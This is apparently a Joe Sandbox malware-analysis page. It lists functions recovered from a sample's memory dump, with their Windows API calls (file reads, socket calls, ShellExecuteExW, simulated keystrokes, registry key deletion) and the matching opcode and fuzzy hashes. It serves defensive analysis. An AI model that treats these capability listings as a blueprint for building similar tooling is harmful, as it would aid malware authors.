Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: d9a17bc1bb242dfbda51f3ac58145bfad5670c768e107bd1f08316ad0cc8a5b8
Instruction ID: a0b2c1780fca89948ee272e7c6810a60e97d898c36f463318c4a6e8b1ded05a7
Opcode Fuzzy Hash: d9a17bc1bb242dfbda51f3ac58145bfad5670c768e107bd1f08316ad0cc8a5b8
Instruction Fuzzy Hash: B7410C317046809EDB359B298C8CBAB7FF1AB45318F24A81DE247B65F1CA75E8C5D720

Function 00E670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00E670DD

Part of subcall function 00E20DB6: std::exception::exception.LIBCMT ref: 00E20DEC
Part of subcall function 00E20DB6: __CxxThrowException@8.LIBCMT ref: 00E20E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E67114
EnterCriticalSection.KERNEL32(?), ref: 00E67130
_memmove.LIBCMT ref: 00E6717E
_memmove.LIBCMT ref: 00E6719B
LeaveCriticalSection.KERNEL32(?), ref: 00E671AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E671BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 00E671DE

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 2a2959b4f864e650997ed89a3b433bdd6f9d77289841fd369871887858566e6d
Instruction ID: bb5cfbaa96c79f0d314734a612fb0760ad8589a6ee7ef1f56ff2cc5922c8e91b
Opcode Fuzzy Hash: 2a2959b4f864e650997ed89a3b433bdd6f9d77289841fd369871887858566e6d
Instruction Fuzzy Hash: 2A316D31900215EFCF00DFA5EC85AAFB7B8EF45710F1541A5E904BB296DB309E54CBA0

Function 00E861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00E861EB
GetDC.USER32(00000000), ref: 00E861F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E861FE
ReleaseDC.USER32(00000000,00000000), ref: 00E8620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E86246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E86257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E8902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00E86291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E862B1

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: e8122b1d5dc78226dd29ab5e4b699d8145b65da38832dd0018d0574ef3cd8cda
Instruction ID: 72e7a0084bc49c00c9ef710449ae8efbc6b63d9b6f3664fb4b07ad7466e2598c
Opcode Fuzzy Hash: e8122b1d5dc78226dd29ab5e4b699d8145b65da38832dd0018d0574ef3cd8cda
Instruction Fuzzy Hash: E1317F72101210BFEB119F51CC8AFEA3BADEF49765F0441A5FE0CAA1A2D6759C41CBA4

Function 00E5BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00E5BBC4
_memcmp.LIBCMT ref: 00E5BBE6
_memcmp.LIBCMT ref: 00E5BBFE
_memcmp.LIBCMT ref: 00E5BC11
_memcmp.LIBCMT ref: 00E5BC2B
_memcmp.LIBCMT ref: 00E5BC3E
_memcmp.LIBCMT ref: 00E5BC56
_memcmp.LIBCMT ref: 00E5BC71

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 34b7a74105c44dfd9a2c30d668714be8e69cc167eba75b75a05f534091648057
Instruction ID: 6c73f52ab9528fda2a44051d531bad98fa0dcbea73af6c8d19268bbbc2cd47b3
Opcode Fuzzy Hash: 34b7a74105c44dfd9a2c30d668714be8e69cc167eba75b75a05f534091648057
Instruction Fuzzy Hash: 7F21F6616013197BEA047621AD42FFFB39C9E2034DF087824FE08B6647EB64DF19C1A5

Function 00E6EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC

Part of subcall function 00E1FC86: _wcscpy.LIBCMT ref: 00E1FCA9

_wcstok.LIBCMT ref: 00E6EC94
_wcscpy.LIBCMT ref: 00E6ED23
_memset.LIBCMT ref: 00E6ED56

Strings

X, xrefs: 00E6ED93

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: d34399a3f1d08a8eb4774fee1b1cb3df9b39873e3614a6d24db28365efd99f4b
Instruction ID: f2e3b8aa7af3f28bf9b702d2458d73fc197f14c30f76d47b81cc863dba4dca07
Opcode Fuzzy Hash: d34399a3f1d08a8eb4774fee1b1cb3df9b39873e3614a6d24db28365efd99f4b
Instruction Fuzzy Hash: 2CC16C756083419FC714EF64D881A5AB7E4EF85354F00692DF999AB3E2DB30EC85CB82

Function 00E76B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E76C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E76C21
WSAGetLastError.WSOCK32(00000000), ref: 00E76C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00E76CEA
inet_ntoa.WSOCK32(?), ref: 00E76CA7

Part of subcall function 00E5A7E9: _strlen.LIBCMT ref: 00E5A7F3
Part of subcall function 00E5A7E9: _memmove.LIBCMT ref: 00E5A815

_strlen.LIBCMT ref: 00E76D44
_memmove.LIBCMT ref: 00E76DAD

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 36b6a0f553532eab051a1afab6c81242d17be8565c437a9ae62a3499190f8c00
Instruction ID: cca5dc26c2e453a4dfe3fca367b9550ec203cd6f94f75b369ae0376b3b7ad615
Opcode Fuzzy Hash: 36b6a0f553532eab051a1afab6c81242d17be8565c437a9ae62a3499190f8c00
Instruction Fuzzy Hash: 8081B171204700AFD710EF24CC81E6BB7E8AF84718F54A919F659BB2D2DA70AD45CB52

Function 00E01424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee25d155d852df949e231b5abf4a9a10cd534cef5ceb4c6a05e119da36b83936
Instruction ID: a03e723aafc658acb3e50a8f6c394b17b8dcfebecff97b563035effc40b74f53
Opcode Fuzzy Hash: ee25d155d852df949e231b5abf4a9a10cd534cef5ceb4c6a05e119da36b83936
Instruction Fuzzy Hash: 20715F30900119EFCB15DF99CC89AFEBB79FF85314F148199F915BA2A1C734AA91CB60

Function 00E8B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(013B5788), ref: 00E8B3EB
IsWindowEnabled.USER32(013B5788), ref: 00E8B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00E8B4DB
SendMessageW.USER32(013B5788,000000B0,?,?), ref: 00E8B512
IsDlgButtonChecked.USER32(?,?), ref: 00E8B54F
GetWindowLongW.USER32(013B5788,000000EC), ref: 00E8B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E8B589

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: dd677e29cd716c8d6cb44d66e06b20ae1a616e501fd1c3a8b0c6c3143fe76801
Instruction ID: c39b18a118be84be05f540aa55dcb51f416bec30f80e665e32e5c8bf1523eaf8
Opcode Fuzzy Hash: dd677e29cd716c8d6cb44d66e06b20ae1a616e501fd1c3a8b0c6c3143fe76801
Instruction Fuzzy Hash: 1F71D134600604EFDB20AF55C896FBA7BB9EF09304F146069F95DB72A2D772AC81DB50

Function 00E7F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E7F448
_memset.LIBCMT ref: 00E7F511
ShellExecuteExW.SHELL32(?), ref: 00E7F556

Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC

Part of subcall function 00E1FC86: _wcscpy.LIBCMT ref: 00E1FCA9

GetProcessId.KERNEL32(00000000), ref: 00E7F5CD
CloseHandle.KERNEL32(00000000), ref: 00E7F5FC

Strings

@, xrefs: 00E7F525

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 51ac284bb2018278220e55bf94913d6fe2db76c0e2b72483fd207cee64cc8430
Instruction ID: 5d624c4b2d2d916ad0b5dbc605ad3efc6e9fa9586b25d050aee7b41039ffbfb6
Opcode Fuzzy Hash: 51ac284bb2018278220e55bf94913d6fe2db76c0e2b72483fd207cee64cc8430
Instruction Fuzzy Hash: A1617EB5A00619DFCB14DFA4C4859AEBBF5FF48314F149069E859BB392DB30AD81CB90

Function 00E60F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00E60F8C
GetKeyboardState.USER32(?), ref: 00E60FA1
SetKeyboardState.USER32(?), ref: 00E61002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00E61030
PostMessageW.USER32(?,00000101,00000011,?), ref: 00E6104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00E61095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E610B8

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 7a37ddd72d2ef895ad7b7b0f47a4bc2ee7463f99e252cfba6409eb2ff47999dc
Instruction ID: 89bb8b51d6ed9bc3dcf84661b76e2201dfab7d9e8893de6b472f92bd877d042b
Opcode Fuzzy Hash: 7a37ddd72d2ef895ad7b7b0f47a4bc2ee7463f99e252cfba6409eb2ff47999dc
Instruction Fuzzy Hash: 6D5101A06847D53DFB3342349C15BBBBEE95B06388F0C95C9E1D8A68D2C298ECC8D751

Function 00E60D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00E60DA5
GetKeyboardState.USER32(?), ref: 00E60DBA
SetKeyboardState.USER32(?), ref: 00E60E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E60E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E60E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E60EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E60EC9

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: b093929a1bb2346777af6b7c2fd43ba45be4dd93a4525cc4b9849bea96d6f47a
Instruction ID: 7f246ffb3806a628be65657dce02c3648e8cdb0ae7c54871bf1a3a4361b6b7bb
Opcode Fuzzy Hash: b093929a1bb2346777af6b7c2fd43ba45be4dd93a4525cc4b9849bea96d6f47a
Instruction Fuzzy Hash: 0B5138A06847F53EFB3283349C55B7B7FA95B06344F0C9988F1D4664C2C395AC88E350

Function 00E655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00E6560A
_wcsncpy.LIBCMT ref: 00E6563F
_wcsncpy.LIBCMT ref: 00E65671
_wcsncpy.LIBCMT ref: 00E656A4
_wcsncpy.LIBCMT ref: 00E656E6
_wcsncpy.LIBCMT ref: 00E65720
_wcsncpy.LIBCMT ref: 00E6574F

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 57b1e07d7fb8c6222ab8636b775b7a64c4d59b1cb7d2a0ebd4722570cdfad47e
Instruction ID: b197625a0a9c99d19e150f49c35470ebaa3860d8057a8f852e44b40ee777eeea
Opcode Fuzzy Hash: 57b1e07d7fb8c6222ab8636b775b7a64c4d59b1cb7d2a0ebd4722570cdfad47e
Instruction Fuzzy Hash: F241D866D5022876CB11EBB4EC469CFB7F89F04310F50645AF609F3121FB34A285C7AA

Function 00E5D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E5D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E5D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E5D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E5D69D

Strings

DllGetClassObject, xrefs: 00E5D610
,,, xrefs: 00E5D578

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,$DllGetClassObject
API String ID: 753597075-2867008933
Opcode ID: ee79ca4ba313095c8ae1c317a88c2c889131caa3c92243035139ddfdc1fee35e
Instruction ID: 3de353cdb548cbaa85371de3cdae1374348c5485426a62a57b7fdf8bbe998c26
Opcode Fuzzy Hash: ee79ca4ba313095c8ae1c317a88c2c889131caa3c92243035139ddfdc1fee35e
Instruction Fuzzy Hash: C441AFB1604204EFDF24DF14CC84A9A7BA9EF44315F1594ADED09EF205D7B0D949CBA0

Function 00E63671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E6466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E63697,?), ref: 00E6468B

Part of subcall function 00E6466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E63697,?), ref: 00E646A4

lstrcmpiW.KERNEL32(?,?), ref: 00E636B7
_wcscmp.LIBCMT ref: 00E636D3
MoveFileW.KERNEL32(?,?), ref: 00E636EB
_wcscat.LIBCMT ref: 00E63733
SHFileOperationW.SHELL32(?), ref: 00E6379F

Strings

\*.*, xrefs: 00E6372D

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: e990ea48047c78cacd9ca9ccce73141e9528419bd445024ca8f6cc68344b2285
Instruction ID: 481ba4f520aa933baa4ffefdfb098f68b439609fe2ba6dcc63774aa58c6970b4
Opcode Fuzzy Hash: e990ea48047c78cacd9ca9ccce73141e9528419bd445024ca8f6cc68344b2285
Instruction Fuzzy Hash: B74183B1548344AEC751EF74E4419DF77E8EF89384F00282EF499E32A1EA34D689C756

Function 00E87291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E872AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E87351
IsMenu.USER32(?), ref: 00E87369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E873B1
DrawMenuBar.USER32 ref: 00E873C4

Strings

0, xrefs: 00E8729E

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 980566f54ac2f54e4d5d00cf4a990a91c948beea3979c22e4f2a2141390792be
Instruction ID: 6392baf952ab528ed3461b8a796deb656bba78f470282d489a7cdf6d70d48c12
Opcode Fuzzy Hash: 980566f54ac2f54e4d5d00cf4a990a91c948beea3979c22e4f2a2141390792be
Instruction Fuzzy Hash: 40412675A04208AFDB20EF50D884E9ABBF8FB04314F24A529FD99A7260D731ED54EB51

Function 00E80FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00E80FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E80FFE
FreeLibrary.KERNEL32(00000000), ref: 00E810B5

Part of subcall function 00E80FA5: RegCloseKey.ADVAPI32(?), ref: 00E8101B
Part of subcall function 00E80FA5: FreeLibrary.KERNEL32(?), ref: 00E8106D
Part of subcall function 00E80FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00E81090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00E81058

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 88d9e81b635c9d3f376e5d08d2cbe19c4f80fb4c7fa9784e5e6d49559ed9f706
Instruction ID: d346e3bf18a8a4451b2024f8927e53f793484d2b0a2069af09f9d971c3adb1ec
Opcode Fuzzy Hash: 88d9e81b635c9d3f376e5d08d2cbe19c4f80fb4c7fa9784e5e6d49559ed9f706
Instruction Fuzzy Hash: 98311C71901109BFDB15AB90DC89AFFB7BCEF08304F1001A9E509F2141EA749E8A9BA0

Function 00E862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E862EC
GetWindowLongW.USER32(013B5788,000000F0), ref: 00E8631F
GetWindowLongW.USER32(013B5788,000000F0), ref: 00E86354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E86386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E863B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00E863C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E863DB

Memory Dump Source

